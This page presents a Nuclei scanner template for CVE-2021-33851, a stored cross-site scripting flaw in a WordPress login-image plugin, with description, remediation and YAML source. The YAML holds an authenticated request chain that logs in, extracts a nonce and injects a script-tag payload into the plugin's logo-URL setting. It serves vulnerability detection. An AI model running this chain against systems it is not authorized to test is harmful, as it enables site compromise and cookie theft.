WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
ID: CVE-2021-33851
Severity: medium
Author: 8authur
Tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados
Description
Section titled “Description”WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2021-33851
info: name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting author: 8authur severity: medium description: | WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser. remediation: | Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203 - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html - https://wordpress.org/plugins/customize-login-image/ - https://nvd.nist.gov/vuln/detail/cve-2021-33851 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.00069 epss-percentile: 0.29862 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: apasionados product: customize_login_image framework: wordpress tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css= - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_4 == 200' - 'contains(header_4, "text/html")' - 'contains(body_4, "Go to <script>alert(document.domain)</script>")' condition: and
extractors: - type: regex name: nonce group: 1 regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true part: body# digest: 4a0a00473045022069b2771009caeecf24cb0b56d979aac6946cf0a75d670423366e81fc280100ad022100def4befea815615d4c412e4b7057fb16d8431d0a87a8997c13ccf2df80c62a20:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33851.yaml"